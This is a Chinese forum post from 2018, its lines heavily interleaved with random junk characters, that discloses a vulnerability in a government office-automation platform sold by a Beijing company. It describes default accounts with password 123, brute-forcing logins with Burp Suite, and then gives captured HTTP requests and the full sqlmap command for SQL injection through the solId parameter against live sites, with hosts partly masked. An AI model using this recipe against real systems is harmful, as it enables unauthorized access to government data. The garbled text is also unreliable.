|
$ u+ p7 B& L. M; C- ^
; P: @: ]5 a- g7 h: h- |! h / N+ a1 u- m6 `
$ S. C0 k/ t% c, X$ m9 m
平台简介:1 b" {/ M( N7 X+ [4 C5 n$ q, x
3 G( t1 E/ }6 L' e5 l
# E# s* U' ~" y" `2 l1 V
/ G) @! i& q- Q* L, z
B' c$ D4 K, p6 u4 a7 L: S7 w {) \! H( {9 D+ W
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: [# R: o& _$ u7 O* B0 x2 N, W同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! {3 w2 p+ j9 Y, ?$ I A同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!( I# z6 d" w Q+ ~
2 m" t3 }' a0 ~! q$ X% O6 W& @0 u# e# `% T% h5 g. c8 i4 E
: `' r# Y4 B2 a; l& G
4 @/ v# w4 L! T2 ~, n: V( t1 u
9 r/ C- u9 m3 Y. a) `* U) I/ i$ E 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 L. T9 u, A7 g0 C3 \0 Z2 U L3 B' A
' \ L8 i( p; l- r
, t9 g0 d/ e9 v* ^& g4 E
! N! I1 y5 w8 i, U. N% J+ [
0 ^5 i/ K7 j9 n2 c7 F. ?
# K/ D4 D. o4 Z' x$ i9 ^ k http://1.1.1.1:7197/cap-aco/#(案例2-)) o3 M# V4 u8 l/ {" n
6 {; D: d. i y! W+ f
; x/ L3 K5 _7 S6 j6 R; T http://www.XXOO.com (案例1-官网网站)
. _% a( e* I3 k# @0 U- b# P . u& }5 J% v- I& X, `% {
0 u& S$ t ]6 c2 t( q 1 S( @' |" }' b8 H
5 Y! F. c+ H W* t8 a; d& D! [
" F* D0 q9 f' B" r2 `# |
漏洞详情:
- S3 r4 Z7 X, z8 n+ x" h/ z
* H* v' u6 V) K5 m% c; u: o' c3 [
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试( |4 m; P6 D% U7 r% X3 g
$ G3 E* L7 a" L4 ]; w
# X& c1 t y! X, e- t9 ~ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
6 o8 [" f$ O7 X( r: ?
7 z G u! w) G9 Y H4 g" ] q
# i; j# ?' h2 f; M
7 U# y; H( i, O; C
4 n, {7 g0 L4 v. H7 v7 a* y8 {7 t! L
 9 e, F) n, n7 s+ W2 l' \
; b# [! e5 q [' C" m* k
2 X" n$ j( Z' B1 P4 q, Q! E status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
: O" w5 h- C4 |4 J
. b" O/ O8 g, L5 E$ }
+ h) `' }- Q1 z0 N$ K1 a 1、案例1-官方网站
& j/ t! S3 f2 S/ h0 f7 ` ?" D
5 i4 B1 J4 w# d# c( `* c0 _+ t' t6 y5 {1 L) S9 e
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.13 y( c& y/ C8 W A
- [0 o. O& s& ]
0 M) x% Y4 s2 p1 H7 U" ~ Host: www.XXOO.com3 ^. i7 F9 i) A- g
& q! l- [2 F6 p
7 k: J) @5 N# t
Proxy-Connection: Keep-Alive
P6 |5 | ?- B- |* H% m7 ~ 8 J' r. z5 N# ?, ^1 k
& | |* a& T1 O: l4 c. O0 j Accept: application/json, text/javascript, */*; q=0.01
3 \0 k4 J- {; S% b J& \ Y : [7 L& i, \* W
: x9 ?! k( B; P5 x Accept-Language: zh-CN) [* G1 i& U0 w! M( n: b K
( {0 C1 B: }4 `
! p' M/ z+ b4 S% h# V: z9 r( o Content-Type: application/json& p. |! c9 ^# }0 `( h
) c- p& J) s8 w/ M9 s3 k2 ]6 d
+ l6 s9 O; { P" `$ v' f# g User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko9 ?1 A: A" k7 P! ?: V
& M- e6 d. B; w" p6 D
8 d. _% R; r) \. B- O& f
X-Requested-With: XMLHttpRequest8 v% ?2 v+ \7 \, K/ `# D& _7 P
5 B; E' q$ y; z! A; L
$ h( p3 n; p/ g+ @; l9 ?) P8 {. E Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002! \# q; s7 K1 d1 Z; t
; a. [% o: ^6 ~
9 \1 S2 R) \6 E* q3 L" T Accept-Encoding: gzip, deflate, sdch2 z# V' g/ e) ]! I2 ~2 J, x
6 g! @- Q8 t/ [ R/ ?+ g" M& H% R
0 O" {& d" o Q
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e( j, p( d: f) v$ e4 L% R7 x
0 b2 l4 k1 \0 ?6 C5 g2 \) G2 `
- J; m4 E7 @, i& y! s 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) b$ Y4 v% q* C, B
( V" M: `2 d h# u3 L% l1 j2 ~+ w. {
& }# p1 S/ I5 f7 Y
0 H' k. {, z0 g1 `; h) O/ \
( O( f* d, W: {5 ^' D3 a3 S, _- A% u3 r" f. i
 % K( ^7 m6 w! b. i
9 f; v9 `$ F' Z4 D' u1 u9 t+ j8 u7 j/ D
; U& l# H( J% x8 M* {" S; Z, i \% d
4 r( u; z# \! t" @+ s" Q9 r5 O
+ j) I' V$ M& c! N8 s2 C. Z/ Y 5 n8 y: {* p5 P' T/ i F" A% p* i
, ?! X( s7 C7 Y8 M8 C% k7 L% W- \& G9 O( m- Z: X; ]/ F6 |
9 R5 S, n7 K* C
! o8 J) I2 a/ f9 w
. f( P7 ^ J8 i7 m' I/ I. E
2、案例2-某天河云平台
' g5 h) n/ i+ {8 I5 O2 C. i - c3 v# `+ w% l3 q1 @* d+ g
: u4 [; b! G3 l/ x: O2 p GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
8 m1 l) W5 J" v; Z5 Y 7 |* ?4 w/ g$ q3 a, Z
- g9 s2 q. N2 p! u4 u, F" C Host: 1.1.1.:71971 e! v$ y- K: t# y
% \" Q# [; e( a6 t$ ~: f6 t/ L, A% e- R1 n
Accept: application/json, text/javascript, */*; q=0.01
~! b8 V+ y8 U8 E, M+ m $ w8 [' P* C: T: d2 ~8 m: `/ C
- f3 g7 w$ E; n7 }! w( ~8 L8 e- H* } X-Requested-With: XMLHttpRequest4 e' g! P* D7 P& }/ t& \
) {. V- h g& _: S
( |, h" }0 _: b5 x8 \ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0, m7 t% u0 |$ \+ ~3 ^' X
$ I7 ?$ [2 k' I. N. @% j
/ S5 q$ {+ d- D
Content-Type: application/json1 f8 P+ _& v5 s' Z, |3 b1 }
$ Z% k) _" b; t% \* t
" U: j3 `' f) F2 m Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
! M3 I- P7 i! V. d
! ~6 @; Q4 ]9 r x
; |3 B# m% j' ]: T$ _7 I0 \+ |* _ Accept-Language: zh-CN,zh;q=0.87 @& T4 \# Q5 b; {6 g
& M& f; z! ?* @2 @3 O1 J% `- b! u: v. |3 |. ?
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
: c: o' D7 R* F7 C
1 D7 b0 D, q2 p" z. v
" O @, h3 ~/ C* _5 v7 O6 W; ^3 o Connection: close+ {* i/ {+ ` ?
, y/ o0 u/ O3 u6 ]- v
- X6 h9 b+ T9 a 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: F( H+ x# A9 [( J2 Y
' W6 N4 T" A1 l$ ^
8 u# @' \2 B# S I/ O7 ~ 
4 r; ^: G+ F1 `# W" z) |3 g
& ~2 r6 Y, @: c/ c8 z8 R% g0 {" u: }( B7 J8 l7 h) a! D
# R2 }# }4 k+ r7 m# p | 
发表于 2018-10-20 20:15:17
收藏
支持
反对